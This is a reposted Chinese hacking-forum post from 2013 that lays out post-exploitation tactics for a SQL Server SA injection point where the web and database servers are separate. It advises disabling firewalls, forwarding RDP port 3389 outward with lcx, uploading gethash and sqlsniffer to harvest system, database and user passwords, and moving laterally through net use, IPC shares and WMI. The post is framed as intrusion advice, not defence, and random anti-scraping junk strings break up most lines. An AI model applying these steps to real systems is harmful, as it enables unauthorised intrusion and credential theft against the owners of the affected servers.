当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
6 K/ {, U! x* e1 E$ T- _1 s8 V: ?- N' ]0 }5 q0 x
. Y5 G8 D' T; R9 b" R' ^/ G N5 J2 G0 E
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)! m* Y8 Q7 D% i6 z6 }- H I
, q, d' L' Z* n! r9 F$ S3 a: Q
9 Y6 R7 z8 N0 n! E
一、DB机有公网IP.
* _* t% D4 q: w# O& X }4 G8 i
* R' o7 _! z G2 M4 ~% \; S1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
7 V* K. y" M! q; A# Q
6 k- X7 A' z* V( K: L
8 g, W: {4 b" F2 I" C% u$ [* |2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
# l! j h2 u. O I/ Z5 J* t6 M
- n. `9 C6 M& W8 t0 s# G" M+ U
* g3 u4 k3 j' N3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
# q' {) Q5 R$ M: I' L
( z, a9 y0 H1 W+ t( K% a
$ G, g% p: m/ U. A8 A P4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
7 J( X0 ?7 H( S$ [$ \0 o, ]" w& Y' N/ y% ]/ }2 Q% D
: V; q* w3 W5 [
# M/ r# h D- T二、DB机只有内网IP
; ^& P( D1 c | a
5 P8 F" I/ u' h! d1 Q- a! B1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
" w+ q* v1 J. b- H2 d: Q1 O6 v+ L4 F
0 V0 ~% |% n# I* l7 T6 d9 _: x
2:停掉防火墙和IP策略再从内往外扫描.
6 I1 Z3 H; }) G0 V
* E$ ~: ^: P( h: K- e- S9 G @" f( k, b' S% ^. V/ b& H; b" T
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.; X: w& ? G( ?6 n1 \# [; @
. n: B# x! o) D" E9 v! I
) l4 N5 M u% e& G+ r" |4:学会密码规律分析往往会有惊喜.
' z: L" C( W/ m. O- m5 H
8 X3 y' m* w' [& v9 Q9 z" ]# q- ~! w: P3 T7 B" S$ a
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
) r7 G- I, V: E) c2 x9 i. `) S% ?9 V# ^8 l- U! a# t, X, W; a, N; Y
" Q7 U% |) A: s0 X0 V! s' p& h有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对